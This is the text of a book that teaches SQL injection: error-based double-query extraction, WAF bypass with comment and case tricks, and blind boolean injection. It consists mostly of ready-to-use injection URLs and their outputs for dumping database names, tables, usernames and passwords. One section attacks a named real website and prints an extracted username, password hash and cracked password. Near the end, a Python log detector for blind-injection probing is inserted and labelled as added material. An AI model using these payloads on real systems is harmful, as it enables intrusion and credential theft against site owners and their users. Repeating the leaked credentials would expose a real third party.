Ultra Hackers Training Kit
Y. Anto

For Ethical Hackers and Cyber Security Professionals

-- Y. Anto

About the Author
Y. Anto

Y. Anto (MCITP, CCENT, MCTS, MCP, CCNA and CEH, among other certifications) is a writer, Hacker, Web designer, Network administrator, Phone application developer, Network Designer, Enterprise Administrator, Hardware technician, Cyber security expert, Engineering Student, Microsoft Student Partner, Intel Software Partner, Photographer and trainer who has been working with networks. He has previously attended many IEEE international conferences and national conferences, and more; his research was about securing IT: "The best way to hack is the best way to secure". Read more about Anto by visiting his technical blog at
http://anto2010.weebly.com

To watch more hacking multimedia content visit his channel
http://www.youtube.com/universityofhacking
or
http://www.youtube.com/W1Channel

Contents at a Glance

CHAPTER 1  DOUBLE QUERY BASED SQL INJECTION  1-21
CHAPTER 2  SQL INJECTION BYPASSING WAF  22-29
CHAPTER 3  TIME BASED BLIND SQL INJECTION  30-38

DOUBLE QUERY BASED SQL INJECTION  CHAPTER 1
What is double query based SQL injection?

It is another type of SQL injection. In this method we query the SQL database with two queries combined into a single query statement. This confuses the backend database and causes errors to be thrown on the client side; the errors received contain the information we are trying to extract.

Attacking methods

Steps to be followed


Step1


SQL Command

http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select
concat(database())) FROM information_schema.tables
LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)

Now you will get result like this

As you can see the site is vulnerable and returned an error with the current database listed in the error, in this case "Vicitim_Database". Here we have used both floor() and rand() to query information_schema.tables, which are being nulled out in this request as floor(rand(0)*2) is null, which allows the rest of our request to be processed and return the current database name. The basic syntax will repeat itself, so you will pick it up over time if it does not catch on right away. Moving on, now that we know it is vulnerable we can test for additional databases, as well as version info and user info. Once the basic system info is grasped we can move on to grabbing tables, columns, and finally extraction of data. In order to test for additional databases we need to first grab the count by altering the above request to:

Step2

SQL Command

http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select (SELECT
distinct concat(0x7e,0x27,count(schema_name),0x27,0x7e)
FROM information_schema.schemata LIMIT 0,1)) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x
from information_schema.tables GROUP BY x)a)

Now you will get result like this


Now that we have the count we can alter the above to use
CONCAT and LIMIT to grab the name of each database
available.

Step3

SQL Command

http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select (SELECT
distinct concat(0x7e,0x27,cast(schema_name as
char),0x27,0x7e) FROM information_schema.schemata
LIMIT N,1)) FROM information_schema.tables LIMIT
0,1),floor(rand(0)*2))x FROM information_schema.tables
GROUP BY x)a)

NOTE: You will need to keep incrementing the value of "N" in the middle of the above query to work your way through the available DB names; just keep going until you have reached the number returned in our request above this one (i.e. LIMIT 0,1 followed by LIMIT 1,1 followed by LIMIT 2,1, and just repeat as needed). We have to do this since we can't use GROUP_CONCAT.


Now you will get result like this

The message will appear the same, but LIMIT will be changed to get a different DB name each time.

Step4

Once you have all the DB names you might want to find
out the current user and confirm version info as well as
some other basic stuff. It can be done using slight
variations to our original query for current database which
would look like this, notice only the call in the middle is
being altered.

SQL Command

Finding the version of the database


http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select
concat(version())) FROM information_schema.tables
LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)

Now you will get result like this

Step5

User

SQL Command

http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select concat(user()))
FROM information_schema.tables LIMIT
0,1),floor(rand(0)*2))x FROM information_schema.tables
GROUP BY x)a)


Now you will get result like this

Step5

DATADIR

SQL Command

http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select
concat(@@datadir)) FROM information_schema.tables
LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)

Now you will get result like this


Step6

HOSTNAME

SQL Command

http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select
concat(@@hostname)) FROM information_schema.tables
LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)

Now you will get result like this

NOTE: DATADIR & HOSTNAME might not always work, depending on version and DB setup.


Step7

Find the number of tables

Alright, we have gathered the basic info, so now it is time to move on to actually grabbing the table and column names. As with other methods we will start with tables and then work to columns, and like the above examples we will be using CONCAT and LIMIT to allow us to get the entire contents since we cannot use GROUP_CONCAT(). We first get the count and then enumerate the tables.

SQL Command

http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM
`information_schema`.tables WHERE
table_schema=<HEX_VALUE_OF_DB_NAME>)) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x
FROM information_schema.tables GROUP BY x)a)

Now you will get result like this



Once the count is known, we enumerate tables one by one.

Step8

Finding the table name

SQL Command

http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select (SELECT
distinct concat(0x7e,0x27,cast(table_name as
char),0x27,0x7e) FROM information_schema.tables
WHERE table_schema=<HEX_VALUE_OF_DB_NAME>
LIMIT 1,1)) FROM information_schema.tables LIMIT
0,1),floor(rand(0)*2))x FROM information_schema.tables
GROUP BY x)a)


Now you will get result like this

You will need to HEX the name of the DB from which you are pulling table names, or it will not be properly processed; the same is true if you are pulling columns from tables, as we will do in this next step now that we have found some tables.

Step9

Finding the number of columns

SQL Command

http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM
`information_schema`.columns WHERE
table_schema=<HEX_VALUE_OF_DB_NAME> AND
table_name=<HEX_VALUE_OF_TABLE_NAME>))
FROM information_schema.tables LIMIT
0,1),floor(rand(0)*2))x FROM information_schema.tables
GROUP BY x)a)

Now you will get result like this

Once the number of columns is known we can just use LIMIT again to sort through them one by one; just keep incrementing LIMIT until you have found as many as it returned in the above request.

Step10

Finding the column name

SQL Command

http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select (select distinct
concat(cast(column_name as char)) FROM
information_schema.columns WHERE
table_schema=<HEX_VALUE_OF_DB_NAME> AND
table_name=<HEX_VALUE_OF_TABLE_NAME>
LIMIT 0,1)) FROM information_schema.tables LIMIT
0,1),floor(rand(0)*2))x FROM information_schema.tables
GROUP BY x)a)

Now you will get result like this

OK, so now we have outlined the entire database structure and know the tables and columns. Now it is finally time to extract the desired data from the database.

Step11

Final process

SQL Command

http://Victim.com/index.php?id=7+and+(select 1
FROM(select+count(*),concat((select+concat(0x3a,username,0x3a,password,0x3a,email,0x3a) FROM
<TABLE_NAME>+LIMIT+0,1),floor(rand(0)*2))x
FROM information_schema.tables+GROUP BY x)b)

Now you will get result like this

If you need to continue you can do what we have done for every other request and start incrementing the LIMIT value to enumerate all of the data you want to pull. You have successfully extracted data using Double Query SQL Injection.


Hands on experience

Step1
First you must target a site; here I am targeting

http://www.techvision.co.uk

Step2
Check whether the site is vulnerable or not; in my case this site is vulnerable

http://www.techvision.co.uk/news.php?id=45

Now you can get an error like this:


You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near ''' at line 1

Step3
Check the version of MySQL

http://www.techvision.co.uk/news.php?id=45+and+(select+
1+from(select%0Acount(*),concat((select+concat(version()
)+from+information_schema.tables+limit+0,1),floor(Rand(
0)*2))a+from+information_schema.tables+group+by+a)b)

Now you can get version of the database:

Duplicate entry '5.0.95-log1' for key 1


Step4
Check the name of the database

http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Duplicate entry 'techvision281009~1' for key 1


Step5
Find the name of the table

http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Duplicate entry 'users~1' for key 1

Next you must convert the name of the table to a hex value. Nowadays there are many tools available online for the conversion.


Step6
Find the name of the column present in the table

http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7573657273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Duplicate entry 'username~1' for key 1


Step7
Find the name of the column present in the table

Here I am changing the limit to find another column:

columns where table_name=0x7573657273 limit 2,1)

http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7573657273 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Duplicate entry 'password~1' for key 1


Step7
Final step

Duplicate entry
'debandy~9679ee7b0e7ddb35b34046a7c76e6e23~1' for
key 1

Crack the MD5 hash value to recover the password

9679ee7b0e7ddb35b34046a7c76e6e23 = l674300b

Note: only for learning purposes, do not use it for illegal operations

SQL INJECTION BYPASSING WAF  CHAPTER 2

What is SQL injection bypassing WAF?

WAF stands for Web Application Firewall. It is another type of SQL injection. Nowadays SQL comments are used for SQL injection; they allow us to bypass a lot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attacker's commands while commenting out the actual legitimate query.

Some other comments in SQL:

//, --, /**/, #, --+, -- -, ;

Attacking steps
http://www.victim.com/index.php?id=777
No Errors

http://www.victim.com/index.php?id=777''
Errors



http://www.victim.com/index.php?id=777+ORDER+BY+1,2,3,4,5--

No Errors

http://www.victim.com/index.php?id=777+ORDER+BY+1,2,3,4,5,6--

Errors

http://www.victim.com/index.php?id=777+UNION+SELECT+1,2,3,4,5--

403 Forbidden

http://www.victim.com/index.php?id=-777+UNION+SELECT+1,2,3,4,5--

403 Forbidden

Now we will see if we can get one past the WAF system by
using some comments to hide the parts of our statement
that our most likely being filtered.

http://www.victim.com/index.php?id=777+UNION+SELECT+1,2,3,4,5--

403 Forbidden


http://www.victim.com/index.php?id=-777+UNION+SELECT+1,2,3,4,5--

403 Forbidden

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,2,3,4,5--

No Errors

Now there is no more 403 Forbidden message stopping you, and you can see the vulnerable columns displayed on the page. In my examples I will assume columns 2, 4, & 5 are vulnerable. Now that we have the vulnerable columns we can extract some data; let's first find some basic info though. We will use CONCAT to grab the current database name, the current user, and the version info

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,CONCAT(database(),user(),version()),3,4,5--

403 Forbidden


Ok, so now we have commented out our UNION SELECT
statement but something is still setting off the filters. It is
most likely the CONCAT statement. In some cases it is
possible to bypass filters by simply changing the norm up
and retesting.

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,ConCAt(database(),user(),version()),3,4,5--

No Errors

Now you can get result like this

Version = 5.1.81-community

User = sample@localhost

Database() = sampled

Now you will know the current database name, user name
and the version as they are neatly displayed on the page for
us. These two techniques can be combined to evade filters
throughout your Injections as you will see. Now let us try
to get the list of all the databases available, instead of just
the current one


http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GROUP_CONCAT(SCHEMA_NAME),3,4,5+FROM+INFORMATION_SCHEMA.SCHEMATA--

403 Forbidden

Now you know what to do, so start by altering GROUP_CONCAT, same as we did for CONCAT

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(SCHEMA_NAME),3,4,5+FROM+INFORMATION_SCHEM.SCHEMATA--

No Errors

Now you can get result like this

Information_Schema

sampleDB

This should now show us the available databases; now let us check for the tables on the current database.


http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+INFORMATION_SCHEM.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--

403 Forbidden again

In some cases you may have experienced a 403 in the previous step as well; it is due to the fact that often INFORMATION_SCHEMA or TABLES will be filtered. Again, this changes from site to site based on how it was configured, so it could even be other items, but these are the most common. In order to get around the filters we simply need to use our comments method again

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.TABLES--

No Errors

Now you can get result like this

Admin, Groups, Getalk, Users


Now we have all of the tables for the current database displayed on the page without any 403 holding us back. Convert the table name to a hex value:

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e--

No Errors

Now you can get result like this

id

pwd

mailid

OK, now we know the tables and associated columns. It is time to get some data extracted

http://www.victim.com/index.php?id=-777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(id,0x3a,pwd,0x3a,mailid,0x3a),3,4,5+FROM+Admin--


Now you will get id, mailid, pwd etc.

Some useful dorks

/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--

union select column from table

/*!union*/+/*!select*/+1,2,3--

/*!UnIOn*//*!SeLect*/+1,2,3--

un/**/ion+sel/**/ect+1,2,3--

/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3--

TIME BASED BLIND SQL INJECTION  CHAPTER 3

It is another type of SQL injection. In this chapter I show how attackers take advantage of SQL injection vulnerabilities by using time-based blind SQL injection with heavy queries.

Steps to be followed
First you must target any victim for example

http://www.victim.com/index.php?id=777

In blind injections you will be using TRUE/FALSE statements to gain results; here it is based around the feedback received from the server as a result.

http://www.victim.com/index.php?id=777 AND 1=1

No Errors

http://www.victim.com/index.php?id=777 AND 1=2

Errors on Page


Now you have the column count, but we will need to check
the version.

http://www.victim.com/index.php?id=777' and substring(@@version,1,1)=4--+-'

http://www.victim.com/index.php?id=777' and substring(@@version,1,1)=5--+-'

Now you will get result like this:

5.0

So this is a good time to start enumerating some table names from the current database.

Here you will use TRUE/FALSE request statements and then analyze the errors or response generated to determine if we are on the right track, as we will need to start by guessing the table names. This may take some guessing and some time, which is why most people don't like this method, but it can pay off when nothing else will work, so just have some patience. It will work like this:

http://www.victim.com/index.php?id=777' and (SELECT 1 from passwords limit 0,1)=1--+-


Errors

http://www.victim.com/index.php?id=777' and (SELECT 1 from users limit 0,1)=1--+-

Errors

http://www.victim.com/index.php?id=777' and (SELECT 1 from members limit 0,1)=1--+-

Errors

http://www.victim.com/index.php?id=777' and (SELECT 1 from admin limit 0,1)=1--+-

No Errors

Note: in the errors sometimes it will say "Table 'X.<guessed_table_name>' doesn't exist". This error indicates the current database name where "X" is, in case you couldn't find it elsewhere.

Guess it yourself; every database has table names like admin, users, etc.


Now you will be using the TRUE/FALSE results to
determine what columns are present in the table. It will
work like this:

http://www.victim.com/index.php?id=777' and (SELECT substring(concat(1,<insert-column-guess-here>),1,1) from <table-name> limit 0,1)=1--+-'

You are now using SUBSTRING to query within a query and check for columns FROM our found table (admin).

http://www.victim.com/index.php?id=777' and (SELECT substring(concat(1,userid),1,1) from admin limit 0,1)=1--+-

No Errors

http://www.victim.com/index.php?id=777' and (SELECT substring(concat(1,login),1,1) from admin limit 0,1)=1--+-

Errors

http://www.victim.com/index.php?id=777' and (SELECT substring(concat(1,username),1,1) from admin limit 0,1)=1--+-

No Errors


http://www.victim.com/index.php?id=777' and (SELECT substring(concat(1,password),1,1) from admin limit 0,1)=1--+-

No Errors

Now you will change limit to get different

Now that you have found the table name and associated
column names we can actually extract some data. In order
to extract you will change up our syntax slightly so that it
takes advantage of the ASCII CHAR conversion. We will
again analyze the results of based on TRUE/FALSE
responses. This part is very time consuming as we have to
get each letter at a time (in CHAR value) and then convert
it over to get the standard plain text that most people can
identify with.

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>65

TRUE - the first char of the password for admin with userid 1 is greater than 65, so we need to go higher with our next request until we hit an error


http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>122

FALSE - error, indicating it is not a char greater than 122, which is good as that is what we would expect, so now we need to meet in the middle

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>100

TRUE - still need to continue moving higher

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>115

FALSE - getting warmer, but still need to reduce a little

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>112

TRUE - still need to continue moving higher


http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>113

FALSE - indicating we have gone too far - WTF?

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>111

TRUE - indicating we need to move up

As you can see this can take some time. In the example above we would use some reasoning and determine that the char value is greater than 111, but less than 113. When we ran the test against 112 it indicated as true, thus meaning it is greater than OR equal to 112. If we convert this we get the letter "p". OK, so we have the first letter; now let's adjust our LIMIT at the end to move on to the second character position. We will also do our best to use our brains to speed things up and start guessing the next logical character to follow a "p" (like maybe an "a"). It now looks like this:


http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),2,1))>97

TRUE - indicating we need to move up

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),2,1))>98

FALSE - indicating we have gone too far and that we were right with the guess of an "a", which is the char value for 97

OK, so we have now found the first two letters of the password, which are "pa"; let's keep guessing

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),3,1))>115

TRUE - indicating we need to move up

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),3,1))>116

FALSE - indicating we have gone too far and that we were right on track with the guessing of an "s", which is the char value for 115

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),4,1))>116


FALSE - indicating we have gone too far and found us another "s", or

http://www.victim.com/index.php?id=777' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),4,1))>115

TRUE - indicating we have found another "s"

When we put it together we have found char values of 112, 97, 115, & 115, which when converted equate to "pass". The admin with userid 1 has a password of "pass". In some cases the char values may be for an MD5 hash, so it might not come across until you have the entire thing. You can keep adjusting the LIMIT value until you no longer get any return values.
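What this probing looks like from the server side, as an added example that is not part of the book: each request above differs from the last only in the substring position and the ">N" threshold, so collapsing every number in the query string to "#" turns the whole run into one template, and a single client sending many numerically distinct variants of one SQL-looking template is the signal. The log lines are constructed (combined log format is assumed), and the five-probe threshold and the "query string contains a function call" heuristic are my assumptions.

```python
"""Behavioural detector for the chapter's TRUE/FALSE character probing,
run over constructed access-log lines. Added example, not from the book."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Combined log format (assumption): ip ident user [time] "METHOD target PROTO" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')
# Query strings carrying function calls are treated as SQL-looking (assumption).
SQLISH = re.compile(r"\b(?:ascii|substring|select)\s*\(")


def parse(line: str):
    """Return (ip, timestamp, request-target, status) or None for unparsable lines."""
    m = LINE.match(line)
    if not m:
        return None
    ip, ts, target, status = m.groups()
    return ip, ts, target, int(status)


def template(target: str) -> str:
    """Collapse every number in the query string to '#', so the probes
    ...,1,1))>65 and ...,2,1))>98 fall into the same bucket."""
    path, _, query = unquote_plus(target).partition("?")
    return path + "?" + re.sub(r"\d+", "#", query.lower())


def find_blind_probing(lines, min_probes: int = 5):
    """Return [(ip, template, distinct_probe_count)] for every client that sent
    at least min_probes numerically distinct variants of one SQL-looking template."""
    probes = defaultdict(set)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, _ts, target, _status = rec
        tpl = template(target)
        if not SQLISH.search(tpl):
            continue
        numbers = tuple(re.findall(r"\d+", unquote_plus(target).partition("?")[2]))
        probes[(ip, tpl)].add(numbers)
    return [(ip, tpl, len(seen)) for (ip, tpl), seen in sorted(probes.items())
            if len(seen) >= min_probes]


def _probe(pos: int, n: int) -> str:
    # Constructed log line mimicking one of the chapter's ascii(substring(...))>N requests.
    q = ("/index.php?id=777'%20and%20ascii(substring((SELECT%20concat(username,"
         f"0x3a,password)%20from%20users%20where%20userid=1),{pos},1))>{n}")
    return f'203.0.113.5 - - [10/Oct/2013:13:55:36 +0000] "GET {q} HTTP/1.1" 200 512'


SAMPLE_LOG = (
    [_probe(1, n) for n in (65, 122, 100, 115, 112, 113, 111)]
    + [_probe(2, n) for n in (97, 98)]
    + ['198.51.100.9 - - [10/Oct/2013:13:57:01 +0000] "GET /index.php?id=777 HTTP/1.1" 200 2048',
       '198.51.100.9 - - [10/Oct/2013:13:57:09 +0000] "GET /news.php?page=2 HTTP/1.1" 200 1980']
)

if __name__ == "__main__":
    for ip, tpl, count in find_blind_probing(SAMPLE_LOG):
        print(f"{ip}: {count} distinct probes of {tpl}")
```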

Note: this chapter is for training purposes only, do not use it for illegal activities

VDM Verlagsservicegesellschaft mbH, Heinrich-Böcking-Str. 6-8, D-66121 Saarbrücken, www.vdm-vsg.de
